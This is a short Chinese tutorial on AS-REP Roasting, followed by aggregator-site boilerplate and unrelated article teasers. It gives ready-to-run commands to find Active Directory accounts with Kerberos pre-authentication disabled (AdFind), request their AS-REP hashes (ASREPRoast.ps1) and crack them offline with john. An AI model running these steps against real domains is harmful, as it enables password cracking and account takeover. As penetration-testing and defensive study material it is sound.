AS-REP Roasting离线爆破攻击

针对一个域内用户,其账户选项有个设置叫作 “不要求 kerberos 预身份验证”,它默认是关闭的。

当 “不要求 kerberos 预身份验证” 选项被勾选,会出现以下效果:

  • as-req 报文中不需要添加用户 hash 加密的时间戳,自动返回 as-rep 报文。

  • 如果用户能使用用户 hash 解密 as-rep 报文中的 Logon Session Key ,那么代表用户凭据正确。

as-req Roasting攻击的原理就是当我们收到 as-rep 报文后,我们使用密码字典生成多个 hash 来解密 Logon Session Key ,如果成功则爆破出密码。

查询 “不要求 kerberos 预身份验证” 的域用户

工具:adfind

在域外:
adfind -h [dc_ip:dc_port] -u [domain_name\user_name] -up [password] -f "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" -dn
​
[dc_ip:dc_port]:表示域控ip和端口号
[username\domain_name]:表示用户及所在的域
[password]:表示用户的密码
-f:过滤条件为useraccountcontrol:1.2.840.113556.1.4.803:=4194304
-dn:表示显示结果属性为dn
AdFind -h 192.168.72.163:389 -u hacker.com\administrator -up p-0p-0p-0p -f "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" -dn

向 “不要求 kerberos 预身份验证” 的域用户发起 as-req 请求

工具:ASREPRoast.ps1,项目地址:ASREPRoast/ASREPRoast.ps1 at master · HarmJ0y/ASREPRoast · GitHub

Import-Module .\ASREPRoast.ps1 
Get-ASREPHash -UserName [username] -Domain [domain_name] -Server [dc_ip] | Out-File -Encoding ASCII hash.txt
Import-Module .\ASREPRoast.ps1 
Get-ASREPHash -UserName administrator -Domain hacker.com -Server 192.168.72.163 | Out-File -Encoding ASCII hash.txt

离线爆破

工具:john

john --wordlist=[passwords_file] hash.txt
john --wordlist=/tmp/password.txt /tmp/hash.txt

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/940474.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

python中的局部变量、全局变量问题的思考(对比于c语言)

python中的局部变量、全局变量问题的思考(对比于c语言)

今天在运行python时遇到了局部变量和全局变量的问题,令我很迷惑。 首先,我在学习python之前先学习了c语言,所以c语言的一些东西影响了我对这个问题的思考。 在c语言中 局部变量和全局变量的区别就在于作用域的范围大小。在c语言中&#xf…
阅读更多...
进网许可认证、交换路由设备检测项目更新25年1月起

进网许可认证、交换路由设备检测项目更新25年1月起

实施时间 2025年1月1日起实施 涉及设备范围 核心路由器、边缘路由器、以太网交换机、三层交换机、宽带网络接入服务器(BNAS) 新增检测依据 GBT41266-2022网络关键设备安全检测方法交换机设备 GBT41267-2022网络关键设备安全技术要求交换机设备 GB/…
阅读更多...
文件,IO流

文件,IO流

目录 一 java 1. IO流 1)输入输出(以程序的视角判断 ) 1.1 IO流的分类 1)字符流效率高于字节流 1.2 流和文件的关系 2. inputstream--字节输入流 2.1 fileinputstream 2.1.1常用方法: 1)单个字符…
阅读更多...
pymssql-2.1.4.dev5-cp37-cp37m-win_amd64.whl 安装

pymssql-2.1.4.dev5-cp37-cp37m-win_amd64.whl 安装

pip install pymssql 安装pymssql出现下面的问题 error: Microsoft Visual C 14.0 is required. Get it with “Microsoft Visual C Build Tools”: http://landinghub.visualstudio.com/visual-cpp-build-tools 因为要使用python连接sqlserver数据库,需要pymssq…
阅读更多...
vue中验证码的实现方式

vue中验证码的实现方式

在写登录页的时候有的系统会让你也进行一下验证码绘制,那么验证码如何实现的呢?我在写登录页的时候通过将登录框,验证码分开页面来写,最后将它们变成标签来导入到我的样式页面中,这样写不仅方便,更容易修改…
阅读更多...
致远互联OA使用问题及解决方法记录(个人)

致远互联OA使用问题及解决方法记录(个人)

1、更换设备登录账号出现绑定要求 解决:后台管理员账号——M3安全管理——安全设置——删除绑定 2、审批消息错误回退 解决:协同工作——一已办事项——取回——重新审批/流程监督里撤回/流程索道节点回退 3、签章图片在表单上显示过大 解决&#x…
阅读更多...
《计算机组成及汇编语言原理》阅读笔记:p9-p27

《计算机组成及汇编语言原理》阅读笔记:p9-p27

《计算机组成及汇编语言原理》学习第 2 天,p9-p27 总结,总计 19 页。 一、技术总结 1.quantum physics(量子物理学) (1)quantum(量子) quantum的本意是:c. the smallest amount of sth(量子)。 In physics, a quantum is the minimum am…
阅读更多...
java_章节作业

java_章节作业

第1题 package com.hspedu.homework;/*** author:寰愬悏瓒�* date:2024/12/19 version:1.0*/ public class Homework01 {public static void main(String[] args) {//初始化Person对象数组,有3个Person对象;Person[] persons new Person[3];…
阅读更多...
Audiocraft智能音频和音乐生成工具部署及使用

Audiocraft智能音频和音乐生成工具部署及使用

1、概述 Facebook开源了一款名为AudioCraft的AI音频和音乐生成工具。 该工具可以直接从文本描述和参考音乐生成高质量的音频和音乐。AudioCraft包含MusicGen、AudioGen和EnCodec三个模型,分别实现音乐生成、音频生成和自定义音频模型构建。 2、项目地址 https://…
阅读更多...
华为云计算HCIE笔记02

华为云计算HCIE笔记02

第二章:华为云Stack规划设计 交付总流程 准备工作:了解客户的基本现场,并且对客户的需求有基本的认知。 HLD方案BOQ报价设备采购和设备上架 2.安装部署流程 硬件架构设计 硬件设备选配 设备上架与初始化配置 准备相关资料(自动下载…
阅读更多...
StarRocks:存算一体模式部署

StarRocks:存算一体模式部署

目录 一、StarRocks 简介 二、StarRocks 架构 2.1 存算一体 2.2 存算分离 三、前期准备 3.1前提条件 3.2 集群规划 3.3 配置环境 3.4 准备部署文件 四、手动部署 4.1 部署FE节点 4.2 部署BE节点 4.3 部署CN节点(可选) 4.4 FE高可用…
阅读更多...
红米Note 9 Pro5G刷小米官方系统

红米Note 9 Pro5G刷小米官方系统

前言 刷机有2种方式:线刷 和 卡刷。 线刷 线刷:需要用电脑刷机工具,例如:XiaoMiFlash.exe,通过电脑和数据线对设备进行刷机。 适用场景: 系统损坏无法开机。恢复官方出厂固件。刷机失败导致软砖、硬砖的…
阅读更多...
关于Tomcat的一些关键参数

关于Tomcat的一些关键参数

目录 Tomcat参数总览设置位置 参数分析Tomcat内部类maxConnections属性Tomcat内部类的acceptCountTomcat有几个Acceptor线程Tomcat的工作线程池 Tomcat参数总览 package org.springframework.boot.autoconfigure.web; /** * * {link ConfigurationProperties ConfigurationP…
阅读更多...
网络安全核心目标CIA

网络安全核心目标CIA

网络安全的核心目标是为关键资产提供机密性(Confidentiality)、可用性(Availablity)、完整性(Integrity)。作为安全基础架构中的主要的安全目标和宗旨,机密性、可用性、完整性频频出现,被简称为CIA,也被成为你AIC,只是顺序不同而已…
阅读更多...
HIPT论文阅读

HIPT论文阅读

题目《Scaling Vision Transformers to Gigapixel Images via Hierarchical Self-Supervised Learning》 论文地址:[2206.02647] Scaling Vision Transformers to Gigapixel Images via Hierarchical Self-Supervised Learning 项目地址:mahmoodlab/HI…
阅读更多...
智能挂号系统设计典范:SSM 结合 Vue 在医院的应用实现

智能挂号系统设计典范:SSM 结合 Vue 在医院的应用实现

摘要 随着信息技术在管理上越来越深入而广泛的应用,管理信息系统的实施在技术上已逐步成熟。本文介绍了医院预约挂号系统的开发全过程。通过分析医院预约挂号系统管理的不足,创建了一个计算机管理医院预约挂号系统的方案。文章介绍了医院预约挂号系统的系…
阅读更多...
Windows11 家庭版安装配置 Docker

Windows11 家庭版安装配置 Docker

1. 安装WSL WSL 是什么: WSL 是一个在 Windows 上运行 Linux 环境的轻量级工具,它可以让用户在 Windows 系统中运行 Linux 工具和应用程序。Docker 为什么需要 WSL: Docker 依赖 Linux 内核功能,WSL 2 提供了一个高性能、轻量级的…
阅读更多...
【hackmyvm】Diophante 靶场

【hackmyvm】Diophante 靶场

1. 基本信息^toc 这里写目录标题 1. 基本信息^toc2. 信息收集2.1. 端口扫描2.2. 目录扫描2.3. knock 3. WordPress利用3.1. wpscan扫描3.2. smtp上传后门 4. 提权4.1. 提权leonard用户4.2. LD劫持提权root 靶机链接 https://hackmyvm.eu/machines/machine.php?vmDiophante 作者…
阅读更多...
OB删除1.5亿数据耗费2小时

OB删除1.5亿数据耗费2小时

目录 回顾:mysql是怎么删除数据的? 删除方案 代码实现 执行结果 结论 本篇是实际操作 批量处理数据以及线程池线程数设置 记录学习 背景:有一张用户标签表,存储数据量达4个亿,使用OceanBase存储,由于…
阅读更多...
Qt:QMetaObject::connectSlotsByName实现信号槽自动关联

Qt:QMetaObject::connectSlotsByName实现信号槽自动关联

简介 在Qt中,QMetaObject::connectSlotsByName 是一个便利的方法,它可以根据对象的对象名(objectName)自动将信号和槽连接起来。但是,要使用这个方法,必须确保: 1 控件(如按钮&…
阅读更多...
最新文章

Copyright @ 2022~2023